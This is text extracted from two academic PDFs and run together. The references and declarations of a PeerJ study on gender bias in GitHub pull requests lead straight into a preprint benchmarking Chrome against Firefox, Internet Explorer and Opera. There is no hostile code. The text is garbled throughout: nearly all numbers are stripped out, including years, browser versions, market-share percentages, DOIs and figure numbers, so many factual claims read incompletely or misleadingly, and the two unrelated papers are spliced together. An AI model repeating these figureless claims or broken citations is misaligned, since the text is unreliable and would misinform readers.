however, none knew how widespread it was, or whether that bias could be detected in pull requests. second, all researchers took nosek and colleagues’ ( ) online test for implicit bias that evaluates a person’s implicit associations between males and females, and work and family. as is typical with most test takers, most authors tended to associate males with work and females with family (kofink: strong; murphy-hill, parnin, and stallings: moderate; terrell and rainear: slight). the exception was middleton, who exhibits a moderate association of female with career and male with family. additional information and declarations funding this material is based in part upon work supported by the national science foundation under grant number . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science foundation: . competing interests the authors declare there are no competing interests. author contributions • josh terrell, andrew kofink and emerson murphy-hill conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • justin middleton conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • clarissa rainear analyzed the data, wrote the paper, reviewed drafts of the paper. • chris parnin conceived and designed the experiments, contributed reagents/material- s/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • jon stallings conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ncsu irb approved under # . data availability the following information was supplied regarding data availability: data sets from ghtorrent and google+ are publicly available. raw data from figures has been supplied as a supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references antin j, yee r, cheshire c, nov o. . gender differences in wikipedia editing. in: proceedings of the th international symposium on wikis and open collaboration. – . arjona-reina l, robles g, dueas s. . the floss free/libre/open source survey. available at http://floss .libresoft.es. arun s, arun t. . icts, gender and development: women in software production in kerala. journal of international development ( ): – doi . /jid. . benjamini y, hochberg y. . controlling the false discovery rate: a practical and powerful approach to multiple testing. journal of the royal statistical society. series b (methodological) – . brown e, perrett d. . what gives a face its gender?. perception : – doi . /p . burnett m, fleming sd, iqbal s, venolia g, rajaram v, farooq u, grigoreanu v, czerwinski m. . gender differences and programming environments: across programming populations. 
in: proceedings of the acm-ieee international symposium on empirical software engineering and measurement. . byrnes jp, miller dc, schafer wd. . gender differences in risk taking: a meta- analysis. psychological bulletin ( ): doi . / - . . . . chen x. . stem attrition: college students’ paths into and out of stem fields. statistical analysis report. nces - . national center for education statistics. clopper c, pearson es. . the use of confidence or fiducial limits illustrated in the case of the binomial. biometrika – . davison hk, burke mj. . sex discrimination in simulated employment contexts: a meta-analytic investigation. journal of vocational behavior ( ): – doi . /jvbe. . . doll r. . cohort studies: history of the method ii. retrospective cohort studies. sozial-und präventivmedizin ( ): – doi . /bf . terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://floss .libresoft.es http://dx.doi.org/ . /jid. http://dx.doi.org/ . /p http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /jvbe. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. gilbert jr, williams es, lundberg gd. . is there gender bias in jama’s peer review process? journal of the american medical association ( ): – doi . /jama. . . gorman eh, kmec ja. . we (have to) try harder gender and required work effort in britain and the united states. gender & society ( ): – doi . / . gousios g. . the ghtorrent dataset and tool suite. piscataway: ieee press, – . gousios g, pinzger m, van deursen a. . an exploratory study of the pull-based software development model. in: proceedings of the th international conference on software engineering. icse , new york: acm – . gousios g, vasilescu b, serebrenik a, zaidman a. . lean ghtorrent: github data on demand. – . graham jw, smith sa. . gender differences in employment and earnings in science and engineering in the us. economics of education review ( ): – doi . /j.econedurev. . . . heilman me, wallen as, fuchs d, tamkins mm. . penalties for success: reactions to women who succeed at male gender-typed tasks. journal of applied psychology ( ): doi . / - . . . . ho d, imai k, king g, stuart e. . matchit: nonparametric preprocessing for parametric causal inference. journal of statistical software ( ): – doi . /jss.v .i . howard m, pincus j, wing jm. . measuring relative attack surfaces. in: computer security in the st century. springer, – . knobloch-westerwick s, glynn cj, huge m. . the matilda effect in science communication an experiment on gender bias in publication quality per- ceptions and collaboration interest. science communication ( ): – doi . / . krumholz hm, douglas ps, lauer ms, pasternak rc. . selection of patients for coronary angiography and coronary revascularization early after myocar- dial infarction: is there evidence for a gender bias? annals of internal medicine ( ): – doi . / - - - - . lagesen va. . a cyberfeminist utopia? perceptions of gender and computer science among malaysian women computer science students and faculty. science, technology & human values ( ): – doi . / . landy fj. . stereotypes, bias, and personnel decisions: strange and stranger. industrial and organizational psychology ( ): – doi . /j. - . . .x. lemkau jp. . personality and background characteristics of women in male- dominated occupations: a review. psychology of women quarterly ( ): – doi . /j. 
- . .tb .x. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jama. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.econedurev. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. mcloughlin la. . spotlighting: emergent gender bias in undergraduate engineering education. journal of engineering education ( ): – doi . /j. - . .tb .x. mockus a, weiss dm. . predicting risk of software changes. bell labs technical journal ( ): – . moss-racusin ca, dovidio jf, brescoll vl, graham mj, handelsman j. . science faculty’s subtle gender biases favor male students. proceedings of the na- tional academy of sciences of the united states of america ( ): – doi . /pnas. . nafus d. . ‘patches don’t have gender’: what is not open in open source software. new media & society ( ): – doi . / . nosek ba, banaji m, greenwald ag. . harvesting implicit group attitudes and beliefs from a demonstration web site.. group dynamics: theory, research, and practice ( ): doi . / - . . . . reagle j. . ‘‘free as in sexist?’’ free culture and the gender gap. first monday ( ). roth pl, purvis kl, bobko p. . a meta-analysis of gender group differences for measures of job performance in field studies. journal of management ( ): – . shaw sr, braden jp. . race and gender bias in the administration of corporal punishment. school psychology review ( ): – . vasilescu b, capiluppi a, serebrenik a. . gender, representation and online participation: a quantitative study. interacting with computers ( ): – doi . /iwc/iwt . vasilescu b, posnett d, ray b, van den brand mgj, serebrenik a, devanbu p, filkov v. . gender and tenure diversity in github teams. in: chi conference on human factors in computing systems, chi. acm, – . yu y, wang h, filkov v, devanbu p, vasilescu b. . wait for it: determinants of pull request evaluation latency on github. in: mining software repositories (msr), ieee/acm th working conference on. ieee, – . terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /pnas. http://dx.doi.org/ . / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /iwc/iwt http://dx.doi.org/ . /peerj-cs. the rise of chrome a peer-reviewed version of this preprint was published in peerj on october . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. tamary j, feitelson dg. . the rise of chrome. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. the rise of chrome jonathan tamary dror g. feitelson school of computer science and engineering the hebrew university, jerusalem, israel e-mail: feit@cs.huji.ac.il abstract since chrome’s initial release in it has grown in market share, and now controls more than half of the desktop browsers market. in contrast with internet explorer, the previous dominant browser, the growing dominance of chrome was not achieved by marketing practices such as bundling the browser with a pre-loaded operating system. the shift to chrome therefore raises the question of how chrome achieved this remarkable feat, while other browsers such as firefox and opera were left behind. 
we show that both the performance of chrome and its conformance with relevant standards are typically better than those of the two main contending browsers, internet explorer and firefox. in addition, based on a survey of the importance of major features, chrome product managers seem to have made somewhat better decisions in selecting where to put effort. thus the rise of chrome is consistent with technical superiority over the competition. keywords: browser war, chrome, market share, software adoption, benchmark, feature selection. introduction the most notable use of the internet is the world wide web (www). the web was created by tim berners-lee and his colleagues at cern (the european organization for nuclear research) in . in order to consume information from the web, one must use a web browser to view web pages. the first web browser (which was in fact named worldwideweb) was developed at cern as part of the www project [ ]. but the first popular browser, which set the growth of the web in motion towards the wide use we see today, was mosaic, which was developed by marc andreessen and eric bina at the national center for supercomputing applications (ncsa) in [ ]. the open nature of the web makes it possible for different browsers to co-exist, possibly providing different features, user interfaces, and operating system support. over the years different browsers have competed for the user’s choice. the competition between browsers has led to several “browser wars” — periods of fierce competition between different web browsers that are characterized by technological innovation and aggressive marketing, typi- cally leading to the eventual dominance of one browser and the fall of another. in recent years we have witnessed such a shift (albeit somewhat protracted) from microsoft’s internet explorer to google’s chrome. the reasons for this shift are most probably a mix of technical reasons and marketing reasons. our goal is to explore the technical aspects, and see whether they can explain the growing popularity of chrome. in particular, we wanted to assess the technical quality of chrome and compare it with the quality of its rivals. to do so we downloaded all the version of chrome, firefox, and internet explorer that were released over a period of five years, and compared them using a set of benchmarks which together provide a rather comprehensive coverage of browser functionality and features. as far as we know our work is by far the widest study of its kind. in a nutshell, we find that chrome is indeed technically superior to other browsers according to most commonly- used benchmarks, and has maintained this superiority throughout its existence. also, based on a survey of users, the features pioneered by chrome ahead of its competitors tend to be those that the users consider more important. thus chrome’s rise to dominance is consistent with technical superiority. however, one cannot rule out the large effect of the google brand and the marketing effort that was invested as factors that contributed greatly to the realization of chrome’s technical potential. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: oct , publ: oct the browsers landscape . browsers history not long after the release of the mosaic web browser in it became the most common web browser, keeping its position until the end of . 
the factors contributing to mosaic’s popularity were inline graphics, which showed text and graphics on the same page, and popularizing the point and click method of surfing. moreover, it was the first browser to be cross-platform including windows and macintosh ports. amazingly, by the end of it’s popularity plummeted to only % of the web browser market [ ]. this collapse in mosaic’s popularity was concurrent to the rapid rise of netscape navigator which was released in december and managed in less than two years to reach around % market share (different sources cite somewhat different numbers). several factors are believed to have caused the fast adoption of netscape by users. first, it was a natural followup of mosaic as it was developed by the same people. second, netscape introduced many technological in- novations such as on-the-fly page rendering, javascript, cookies, and java applets [ ]. third, netscape introduced new approaches to testing and distribution of web browsers by releasing frequent beta versions to users in order to test them and get feedback [ ]. netscape’s popularity peeked in when it held around % market share. but in august microsoft released the first version of internet explorer based on an ncsa mosaic license. a year later, in august , with the release of internet explorer , a browser war was on. by august internet explorer enjoyed % market share [ ]. during this browser war it seems that internet explorer did not have any technological advantage over netscape, and even might have been inferior. therefore, other reasons are needed to explain internet explorer’s success. one reason was that netscape’s cross platform development wasn’t economical: instead of focusing on one dominant platform (windows) it had approximately platforms which caused a loss of focus. meanwhile, microsoft fo- cused on only one platform. second, microsoft bundled internet explorer with windows without a charge, and as windows dominated the desktop operating systems market explorer was immediately available to the majority of users without any effort on their part. in an antitrust investigation in the u.s., microsoft was found guilty of abusing its monopoly in the operating systems market by bundling internet explorer with windows for free. lewis describes this as follows [ ]: “adding internet explorer to windows and calling it windows is innovation in gates’ terminol- ogy, but it is monopolizing according to doj.” settling the antitrust case took several years (october to november ), during which internet explorer deposed netscape as the most popular browser. and once internet explorer was entrenched, it’s market share grew even more due to a positive feedback effect. the standard tags used in html (hyper-text markup language, in which web pages are written) are defined by the w c (world wide web consortium). however, both microsoft and netscape extended the html standard with their own special tags, thus creating two competing sets of html tags and behaviors. web developers with limited resources then had to choose one of these tag sets, and as internet explorer usage grew they opted to use internet explorer’s extensions, thereby making it ever more preferable over netscape [ ]. the dominance of internet explorer was so strong that microsoft didn’t bother to release a major version of internet explorer from until , making do with a service pack for internet explorer as part of a windows xp service pack. up to this point browsers were proprietary software, even if distributed for free. 
but with the collapse of netscape’s market share, netscape released its netscape communicator . source code in march for com- munity involvement in the development via mozilla.org [ ]. the mozilla suite was created based on this source code release. however, the development continued to be influenced by netscape communications corporation, which had been acquired by aol. david hyatt, joe hewitt, and blake ross were not pleased with the alliance of mozilla with netscape, which was hurting mozilla independence and more importantly led to feature creep and bloat. so in mid they created an experimental branch of the mozilla suite, which kept the user interface but reimplementing the backend from scratch [ ]. this branch became the open source firefox browser, and on august figure : browsers usage data from statcounter.com. , mozilla released a revised road map that reflected a shift from the mozilla suite to firefox [ ]. firefox was finally released on november , [ ]. later, in march , mozilla moved to rapid development with a -week cycle and then a weeks cycle [ , ]. firefox’s market share grew slowly, and by the end of it managed to wrestle away up to % from internet explorer. but by this time a new contender had arrived. google released chrome . on september , . concurrently, google released most of the browser’s source code as an open source project named chromium thus establishing an open source community. the main reason was the belief that a strong community will help improve chrome [ ]. additional reasons were to help drive the web forward as other open source projects like firefox and webkit did, and enabling people to create their own projects based on chromium. as of today the development of chrome is based on the development of stable releases of chromium, and the two browsers are identical in most aspects [ ]. however, it is important to distinguish chrome from chromium, as chrome has several features that are absent from chromium such as a non-free pdf viewer. chrome and chromium moved to a rapid development strategy in mid [ ]. . browsers usage statistics in the six years since its release chrome has dethroned internet explorer, and firefox’s market share has also decreased, as shown in figure . data for such statistics is obtained as follows. browser usage can be tracked using a counter embedded in the html source code of web sites. the counting is implemented using a request to a counting service, enabling the counting service to also extract the browser information from the request and to use it to tabulate browser usage statistics. the data shown is from one of these services, statcounter.com [ ]. there are two main methods to interpret web browsers usage. the first method is to measure how many page loads came from each type of browser in a certain period of time. the second method counts how many unique clients (installations) were active in a certain period of time. therefore, if a user visits web pages, the first method will count these visits as uses of the browser, while in the second method will count them as one user. since the two methods measure different parameters their results may differ. the first method favors browsers that are used by heavy users, while the second method just counts the number of unique users without taking their activity into account, which may be a drawback if we consider users who use the web extensively to be more important. moreover, identifying unique users is non-trivial and requires manipulating the raw data. 
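The difference between the two counting methods can be made concrete with a toy request log; the numbers below are made up purely for illustration.

```python
from collections import Counter

# Toy log of page loads: (client_id, browser), one tuple per page load.
page_loads = [("u1", "chrome")] * 10 + [("u2", "firefox")] * 2 + [("u3", "chrome")] * 1

# Method 1: share of page loads per browser (weights heavy users more).
by_loads = Counter(browser for _, browser in page_loads)

# Method 2: share of unique clients per browser (one vote per installation).
by_clients = Counter(browser for _, browser in set(page_loads))

print(by_loads)    # Counter({'chrome': 11, 'firefox': 2})
print(by_clients)  # Counter({'chrome': 2, 'firefox': 1})
```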
we therefore use the raw counts data, and specifically the data for desktop browsers only not including mobiles and tablets. (the nick in the graphs at august represents the beginning of collecting data about tablets separately.) as shown in the graph, chrome’s market share has risen consistently over the years, largely at the expense of internet explorer. as of january , chrome was responsible for . % of the page loads while internet explorer was responsible for . %, firefox for . %, and other browsers for . %. note that in fact any site can track the distribution of browser usage among the users who access that site. such tracking may lead to different results if the visitors to a certain site prefer a certain browser. for example, w schools.com (a site devoted to tutorials about web development) also publishes data about browser usage. their results for january are that . % use chrome, . % use firefox, and only . % use internet explorer [ ]. this probably reflects a biased user population of web developers who tend to work on linux platforms rather than on windows. at the opposite extreme, netmarketshare.com claims that only % of the market uses chrome, while fully % still use internet explorer (these figures are again for january ) [ ]. there is a danger that the statcounter data is also biased, but it is thought to provide a good reflection of common usage by the public on popular web sites, because its data is based on counters embedded in many different sites. further justification is given in the threats to validity section. research questions despite possible differences in usage statistics, it is clear that chrome is now a dominant player in the web browser market. the question is how this dominance was achieved, and in particular whether it is justified from the technical point of view. we divide this into the following specific questions: . is chrome technically superior to its competitors? specifically, (a) is the performance of chrome superior to that of its competitors as measured by commonly accepted browser performance benchmarks? (b) is the start-up time of chrome competitive with the start up times of its competitors? (c) does chrome conform to web standards better than its competitors as measured by commonly accepted browser conformance benchmarks? . given that the browser market is not static and web usage continues to evolve, (a) did chrome introduce features earlier than its competitors? (b) were the features that chrome introduced first more important than those introduced by its competitors? to answer these questions we tested the three major browsers which together account for % of the market share. thus we did not initially test opera and safari, whose market share is very low; safari is also less relevant as it is tightly linked to the mac os x platform, so it does not compete with chrome for most users . the question regarding the release of important features earlier also involved a wide user survey to assess the relative importance of different features. note that the performance and conformance evaluations are not tied to one point in time, but rather they are evaluated over the whole period when chrome achieved its rise in market share. as a result we also found interesting information about the consistency (and sometimes inconsistency) of browser benchmarks which was not anticipated in advance. 
(Safari's Windows version was available for only several years and then discontinued.)

Technical performance
In this section we present the methodology and results pertaining to answering research question ( ), namely the relative performance of Chrome and the competing browsers.

Experimental design
Timing is important to web page designers, because it affects the user experience [ ]. But the precise definitions of performance metrics are complicated to pin down [ ]. As a result quite a few different benchmarks have been designed and implemented over the years. Instead of proposing yet another benchmark, we used several of the more widely accepted and commonly used benchmarks to evaluate the technical performance of the different browsers, selecting a set which covers a wide range of functionalities. These benchmarks are divided into two categories. The first category is performance, and tests the performance of different aspects of the browsers. This includes general browser performance, aspects of JavaScript processing, and in particular support for the HTML <canvas> tag. The second category is conformance, and tests the conformance of the different browsers to common standards such as the HTML and CSS standards. Note, however, that the tests typically check only that elements of the standard are recognized, and not the quality of the implementation. This is because assessing the quality may be subjective and depend on graphical appearance. In addition we implemented our own methodology for measuring startup times, as this was not covered by the available benchmarks. The benchmarks and their response variables are listed in Table .

Table : the benchmarks used in our study and their response variables.
Benchmark               Type           Content                        Response
SunSpider               performance    JavaScript tasks               time
Browsermark             performance    general browser performance    score
CanvasMark              performance    <canvas> tag                   score
Peacekeeper             performance    JavaScript tasks               score
Start-up times          performance    cold startup time              time
HTML compliance         conformance    HTML standard                  score
CSS test                conformance    CSS standard                   score
Browserscope security   conformance    security-enhancing features    tests passed

Figure : the release date of each version tested.

Note that the benchmarks do not include low-level issues such as memory usage. The reason is that these benchmarks are not intended to characterize the interaction between the browser and the underlying hardware platform, but rather the interaction of the browser with the user. We selected these benchmarks because market share depends on users who are more influenced by general performance and features, not by details of hardware utilization.

In order to assess the technical performance of the competing browsers during the period when Chrome gained its market leadership, we measured all the releases of these browsers using all the benchmarks. Specifically, the measurements covered all Chrome versions from to , all Firefox versions from to , and all Internet Explorer versions from to , meaning all the browser versions in a five year span starting in mid until the end of (Figure ). This is the period from the first release of Chrome until it achieved around % market share.
the browser versions used on the bit system were chrome – , firefox – , and internet explorer – , i.e. all the browsers released up to may . the browsers versions used on the bit system were chrome – , firefox – , and internet explorer – . the versions were divided between the machines since we encountered some compatibility issues with earlier versions figure : comparing the results of two benchmarks on bit and bit platforms. type benchmark repetitions versions with no data internet explorer firefox chrome performance sunspider . . , ≥ ≥ sunspider . . , ≤ ≤ , , browsermark . , . , . canvasmark , , peacekeeper , , , start-up times conformance html compliance n/a , css test n/a browserscope security n/a table : the benchmarks used in our study, how many repetitions were performed, and which browser versions could not be measured. of chrome on windows bit. moreover, it makes sense to switch to bit along the way to reflect the growing adoption of -bit systems. to make sure that the measurements are consistent between bit and bit operating systems and eliminate operating system bias we have checked a third of the browser versions on both systems, focusing on versions with a six months release gap. examples for two of the benchmarks are shown in figure . sunspider . . is an example of a relatively big difference between the results on the two platforms (which is still quite small), and peacekeeper is an example of a very small difference. in general we did not see any dramatic differences between the platforms. we therefore do not present any more results about such comparisons. on all performance benchmarks we ran repetitions of each measurement, while for the start-up times mea- surements we ran repetitions. error bars are used in the graphs to show the standard error. in all cases, the benchmarks and tests were the only thing that ran on the test machines. the test machines had an internet connec- tion outside our firewall, so they were not on the local departmental network. this was done for security reasons, as our systems group refused to allow the use of old (and probably vulnerable) browsers within the firewall. not all the measurements ran properly with all the versions, especially with earlier versions. the problems were due to the fact that most of the benchmarks were designed and written later than some of the browser early versions, and used some features or technology that were not yet implemented in those early versions. the details are given in table . (a) (b) figure : sunspider . . and . . results. note difference in scale for the two versions. . performance benchmarks results and interpretation . . sunspider sunspider is a well known benchmark developed by webkit, an open source web browser engine project. its goal is to measure core javascript performance and enable the comparison of different browsers or successive version of the same browser. webkit designed this benchmark to focus on real problems that developers solve with javascript [ ]. therefore the benchmark does not include microbenchmarks to evaluate specific language features, but rather tasks such as generating a tagcloud from json input, d raytracing, cryptography, and code decompression. moreover, each of the tests is executed multiple times to ensure statistical validity. however, perhaps due to these repetitions, the behavior of the benchmark may actually not mimic real javascript work on production sites [ ]. the benchmark measures the time to perform a set of tasks, so lower values are better. 
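Each benchmark score discussed below is reported as the mean over the repeated runs, with error bars showing the standard error; a minimal sketch of that summary, using made-up timings:

```python
import statistics

def mean_and_stderr(samples):
    """Mean and standard error of the mean over repeated benchmark runs."""
    mean = statistics.mean(samples)
    stderr = statistics.stdev(samples) / len(samples) ** 0.5
    return mean, stderr

# Hypothetical SunSpider timings (ms, lower is better) for one browser version:
runs = [212.0, 208.5, 215.3, 210.1, 209.7]
print(mean_and_stderr(runs))
```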
in the study we chose to use version . . , which is the current version and was introduced by webkit in order to make the tests more reliable [ , ]. however, version . . didn’t work on old browser versions (table ). therefore, we used version . . on old browser versions [ ], specifically those that were tested on the bit machine. using sunspider . . we find that when chrome was introduced it scored significantly better than internet explorer and firefox. in the second version tested of firefox (firefox . ) the score was greatly improved but still lagged the parallel chrome version. although internet explorer was released a couple of months after chrome it was five times slower. it took more than two years for firefox and internet explorer to catch up with chrome’s parallel version (figure a). in fact, internet explorer not only caught up with chrome but surpassed it. this superior performance has been attributed to its javascript optimization for dead code elimination, which some say was specifically done to boost sunspider performance [ , ]. in the sunspider . . tests internet explorer continued to show significantly better results compared to its rivals. firefox and chrome showed similar results most of the time (figure b). for some reasons chrome versions and had problems with this benchmark, but these were fixed in chrome . . . browsermark . browsermark . is a general browser benchmark developed by rightware (basemark), a purveyor of benchmark- ing and evaluation technology for the embedded systems industry. originally designed to test mobile and embedded devices, it is nevertheless commonly used to also test desktop browsers. the benchmark tests general browser per- formance including aspects such as page loading, page resizing, standards conformance, and network speed, as figure : browsermark . results. figure : canvasmark results. well as webgl, canvas, html , and css / d. the calculated score combines all of these and higher scores are better. the early versions of internet explorer and firefox did not work with this benchmark (which is understandable given that the benchmark version we used was released only in november ). all of the browsers tested showed a distinct improvement trend as new versions were released (figure ). chrome in all of its versions was better than the equivalent rivals and showed a steady improvement over time. internet explorer also showed an improvement over time but always came in last from all the browsers tested. firefox performance was between chrome and internet explorer. interestingly, it showed an inconsistent behavior, with the general improvement in benchmark score mixed with local decreases in score. . . canvasmark canvasmark is a benchmark for performance testing the html <canvas> tag [ ]. this tag is a container for graphics, which are typically drawn using javascript. the benchmark is composed of several stress tests, using elements that are commonly used in games such as operations on bitmaps, canvas drawing, alpha blending, polygon fills, shadows, and drawing text. each test starts with a simple scene and adds elements until the browser is reduced to a rendering rate of frames-per-second (the rate decreases as the scene becomes more complex). the score is a weighted average of the time the browser managed to perform at above frames-per-second. higher scores are better. 
in this benchmark’s documentation there was a note for chrome users using windows, encouraging them to change a setting in order to get better results due to a bug in the gpu vsync option for the windows version of chrome. however, we did not change the setting since we want to test the versions as the average user would. the results of running the benchmark show that chrome exhibited inconsistent results over time (figure ). a great improvement was achieved from version to (version is the first shown, because the benchmark did not run on version – ). in contrast there was a sharp decline from version to . later, an improvement occurred from version to , immediately followed by a sharp decline of % of the score in version . but in spite of all these inconsistencies it was still better than firefox and internet explorer during this time. internet explorer showed an improvement from version to version , when it became the best-performing of the three browsers, due to a deterioration in chrome’s scores. chrome surpassed internet explorer again only in the last version tested. firefox had the lowest scores, and does not show any improvement over time. figure : peacekeeper results. . . peacekeeper peacekeeper is a browser benchmark developed by futuremark, a purveyor of mostly hardware benchmarks for desktop and mobile platforms [ ]. (rightware, the company that developed browsermark, was a spinoff from futuremark.) it includes various tests designed to measure the browser’s javascript performance, but given that javascript is so widely used in dynamic web pages, it can actually be considered to be a general benchmark for browser performance. the tests include various aspects of using javascript on modern browsers, such as the <canvas> tag, manipulating large data sets, operations on the dom tree (the document object model, which describes the structure of a web page), and parsing text. the score reflects processing rate (operations per second or frames per second rendered), so higher is better. in addition the benchmark includes various html capability checks, such as webgl graphics, being able to play various video formats, and multithreading support. chrome scored noticeably better results compared to its rivals for this benchmark, throughout the period of time that we checked (figure ). however, note that peacekeeper did not run on early versions of chrome (table ). also, while there was a general trend of improvement, it was not monotonic. firefox and internet explorer scored similar results, both showing an improvement over time but still lagging behind chrome. . start-up time measurement methodology and results an important feature of all browsers, which may affect user satisfaction, is their startup times when they are launched. as we did not find a suitable benchmark that evaluates startup times we conducted specialized measure- ments to test the browser’s cold start-up times. a cold start-up time is when the browser starts for the first time since the operating system was booted. we tested the start-up times as follows. we wrote a script that runs during the operating system start-up. this script launches the browser one minute after the script starts running. the lag is meant to let the operating system finish loading. a time stamp is created just before launching the browser in order to mark the start time. the browser was set to open with a specially crafted page when it came up. the script passed the time stamp to the crafted page via a url parameter. 
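A minimal sketch of the launcher half of this procedure (the crafted measurement page, described next, records the second time stamp). The browser path and page URL here are placeholders, not the ones used in the study.

```python
import subprocess
import time

BROWSER = r"C:\Program Files\Google\Chrome\Application\chrome.exe"  # placeholder path
PAGE = "http://localhost:8000/startup.html"                         # placeholder crafted page

time.sleep(60)                                      # wait one minute so the OS finishes loading
t0_ms = int(time.time() * 1000)                     # first time stamp, taken just before launch
subprocess.Popen([BROWSER, f"{PAGE}?t0={t0_ms}"])   # pass the time stamp via a URL parameter
```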
the crafted page creates a second time stamp indicating the start of the page processing. the difference between the two time stamps was defined as the browser start-up time. the start-up times are then sent to a server for logging. advantages of this procedure are, first, that it is independent of network conditions, and second, the test is similar to the user’s real experience of launching the browser and loading the first page. the first versions of chrome were the fastest to load (figure ). however, as chrome’s development advanced, it’s start-up times crawled up. in chrome version the start-up times improved dramatically, but then continued to crawl up from version . in version there was a spike in the start-up time, a . fold increase compared to the figure : cold start-up times. previous version, followed by a partial correction in versions and . surprisingly firefox start-up times look steady with a slight decrease, notably in version . as a result, while it was the slowest by a wide margin in , it became the fastest in . internet explorer start-up time were initially similar to those of chrome, but then increased consistently over time, making it roughly twice as slow as the others in recent years (except for the spike in chrome performance since version ). . conformance benchmarks results and interpretation . . html compliance html (hyper-text markup language) is the language used to describe web pages, and the current version is html . html introduced features like the <canvas> tag for use by multimedia applications, and integrated svg (scalable vector graphics) and mathml (for mathematical formulas). the first working draft of html was published in , and the standard was finally approved in , so its definition process fully overlaps the period of chrome’s rise. the html compliance benchmark consists of three parts. the main part is checking the conformance of the browser to the html official specification. the second part is checking specifications related to html such as webgl. the third part is checking the specification for experimental features that are an extension to html [ ]. the score is the sum of points awarded for each feature that is supported. the results for this benchmark show that all the browsers improve over time. firefox had the best score until version . , and after that chrome version and up had the best score (figure ). internet explorer always had the lowest score. . . css test css (cascading style sheets) is the language used to describe the style of html pages. for example, using css one can set the style for web page headings and make it different from the default of the browser. the current version is , although level- modules are being introduced. css test checks how many css elements in the w c specification does a certain browser recognize [ ]. this means css test only checks the recognition itself but does not check the implementation or the quality of the implementation, namely whether the resulting rendition of the web page indeed looks like it should. interestingly chrome’s score did not change in the first three years, though it still managed to have a better score than its rivals. from version chrome consistently improved until the last version tested, remaining better than its rivals all along (figure ). firefox showed several improvements in a stepwise manner. internet explorer figure : html compliance results. figure : css test results. figure : browserscope security results. 
had the lowest score in the first version tested (version ) but improved its score dramatically in versions and , achieving essentially the same level as firefox. . . browserscope security browserscope is a community-driven project which profiles various aspects of web browsers. one of these is the obviously important feature of security. specifically, browserscope security is a collection of tests meant to check “whether the browser supports javascript apis that allow safe interactions between sites, and whether it follows industry best practices for blocking harmful interactions between sites” [ ]. for example, one of the tests checks whether the browser has native support for json parsing, which is safer than using eval. the score is simply how many tests passed. while this is not strictly a conformance test, as there is no official standard, we include it due to the importance of security features on the internet. the results are that all three browsers exhibited a general (although not always monotonic) improvement in their security results over time. the relative ranking according to these tests is very consistent between browser versions (figure ). across practically the whole period chrome had the highest score, firefox had the lowest, and internet explorer was in between. the only exception is a large dip in score for chrome versions and , where version was the worst of all parallel browser versions. this was surprising because of the overall consistency, and the fact that in the first version released chrome had the highest score compared to its rivals. figure : sample opera results overlaid on the previous results. . additional results with opera our main measurements focused on the three top browsers, which together control more than % of the desktop market. but when considering the relative importance of technical issues as opposed to marketing, we felt the need to also consider the smaller browsers. this is especially important in the early years, when chrome’s market share was low, and the question was what enabled chrome to surge ahead while other browsers were left behind. we therefore conducted a few additional measurements using opera. we focused on opera and not on safari for two reasons. first, opera has a reputation for being an innovative and technologically advanced browser. second, safari is specifically targeted for apple platforms, and therefore is not really part of the same desktop market as the other browsers we are studying. not all versions of opera were tested, as many of the benchmarks did not run properly on early versions. the results were that opera performance was generally inferior to that of chrome (two examples are shown in figure ). in some benchmarks, notably browsermark and browserscope security, its scores were actually lower than for all other browsers for many years. the sharp improvement in browsermark shown in figure is probably due to the move to using webkit (and thus the same rendering engine as chrome) in version [ ]; similar improvements were also seen in some other benchmarks in this version. in other benchmarks, such as html compliance and css test, opera’s results were similar to those of firefox throughout. the only benchmark in which opera was the best browser for a considerable period was canvasmark, but this period only started in (and performance dropped in version ). 
feature selection and release another aspect in which the browsers differ from one another is their feature sets: all obviously have the same basic features allowing users to browse the web and display web pages, but new features are added all the time as web usage continues to evolve. however, not all features have the same importance, so it is advantageous for a browser to have the most meaningful features as early as possible. in this section we present the methodology and results pertaining to answering research question ( ), namely which browsers released features early and which browsers lagged in releasing features. in addition we wanted to evaluate the importance of each feature. we used an online survey to assess the importance of each feature to the end users. . experimental design and methodology the investigation of the features embodied in each browser and their release times involved the following steps: # feature explanation pre chrome bookmark management allows the user to organize/delete/add bookmarks password management allows the browser to remember credentials to a certain web site upon the user’s request search engine toolbar easy access to a search engine from the browser tool bar tabbed browsing the ability to browse multiple web pages in a single browser window pop-up blocking blocks pop-ups that the user didn’t explicitly ask for page zooming scale the text of a web page history manager manages history of recent web pages that the user browsed phishing protection block or warn when surfing to web pages that masquerade as another (legitimate) website privacy features manages the user preferences regarding passwords, history, and cookie collection smart bookmarks bookmarks that directly give access to functions of web sites, as opposed to filling web forms at the respective web site for accessing these functions tabbing navigation the ability to navigate between focusable elements with the tab key released at same time access keys allows you to navigate quickly 